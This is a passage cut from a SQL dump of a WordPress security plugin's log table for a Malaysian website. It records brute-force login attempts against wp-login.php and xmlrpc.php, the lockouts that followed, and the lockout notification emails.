13:40:05',18145272,19339536,'https://bintara.com.my/2019/wp-login.php',1,0,'45.40.135.73'),(26020,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYoTHkXpgmG5P@iB8k0cgAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"23.94.187.130\";s:11:\"REMOTE_PORT\";s:5:\"59510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYoTHkXpgmG5P@iB8k0cgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073228.9288\";s:12:\"REQUEST_TIME\";s:10:\"1569073228\";}}','notice','2019-09-21 13:40:30','2019-09-21 13:40:29',17849592,19335664,'https://bintara.com.my/wp/wp-login.php',1,0,'23.94.187.130'),(26021,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:40:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:40:29\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:55:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:55:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:40:30','2019-09-21 13:40:29',17934216,19335664,'https://bintara.com.my/wp/wp-login.php',1,0,'23.94.187.130'),(26022,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:40:30','2019-09-21 13:40:29',18140568,19335664,'https://bintara.com.my/wp/wp-login.php',1,0,'23.94.187.130'),(26023,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYoT1iJ7D9Gn7wDPh8iTQAAAM8\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.210.150.57\";s:11:\"REMOTE_PORT\";s:5:\"32820\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYoT1iJ7D9Gn7wDPh8iTQAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073231.8874\";s:12:\"REQUEST_TIME\";s:10:\"1569073231\";}}','notice','2019-09-21 13:40:33','2019-09-21 13:40:32',17849280,19336008,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.210.150.57'),(26024,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:40:32\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:40:32\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:55:32\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:55:32\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:40:33','2019-09-21 13:40:32',17933704,19336008,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.210.150.57'),(26025,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:40:33','2019-09-21 13:40:32',18140096,19336008,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.210.150.57'),(26026,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYol7fBTP0kPOVnb8jvkQAAAEk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"118.238.4.201\";s:11:\"REMOTE_PORT\";s:5:\"56706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYol7fBTP0kPOVnb8jvkQAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569073303.224\";s:12:\"REQUEST_TIME\";s:10:\"1569073303\";}}','notice','2019-09-21 13:41:44','2019-09-21 13:41:43',17849240,19339960,'https://bintara.com.my/2019/wp-login.php',1,0,'118.238.4.201'),(26027,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:41:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:41:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:56:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:56:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:41:44','2019-09-21 13:41:43',17933736,19339960,'https://bintara.com.my/2019/wp-login.php',1,0,'118.238.4.201'),(26028,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:41:44','2019-09-21 13:41:43',18140192,19339960,'https://bintara.com.my/2019/wp-login.php',1,0,'118.238.4.201'),(26029,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYonFiJ7D9Gn7wDPh8iYwAAAMc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"43738\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYonFiJ7D9Gn7wDPh8iYwAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569073308.257\";s:12:\"REQUEST_TIME\";s:10:\"1569073308\";}}','notice','2019-09-21 13:41:49','2019-09-21 13:41:48',17849408,19340840,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25838,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:15:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:15:27\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:30:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:30:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:15:28','2019-09-21 13:15:27',17884024,19289840,'https://bintara.com.my/blog/wp-login.php',1,0,'185.167.101.30'),(25813,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYh0XkXpgmG5P@iB8kvqQAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"47758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYh0XkXpgmG5P@iB8kvqQAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071569.2462\";s:12:\"REQUEST_TIME\";s:10:\"1569071569\";}}','notice','2019-09-21 13:12:51','2019-09-21 13:12:49',17965008,19290168,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.11.43'),(25814,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:12:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:12:49\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:27:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:27:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:12:51','2019-09-21 13:12:49',17999352,19290168,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.11.43'),(25815,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:12:51','2019-09-21 13:12:49',18205936,19290168,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.11.43'),(25816,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYh1LfBTP0kPOVnb8jtxwAAAEM\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"48692\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYh1LfBTP0kPOVnb8jtxwAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071572.6193\";s:12:\"REQUEST_TIME\";s:10:\"1569071572\";}}','notice','2019-09-21 13:12:54','2019-09-21 13:12:52',18313472,19611696,'https://bintara.com.my/blog/xmlrpc.php',1,0,'159.203.11.43'),(25817,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 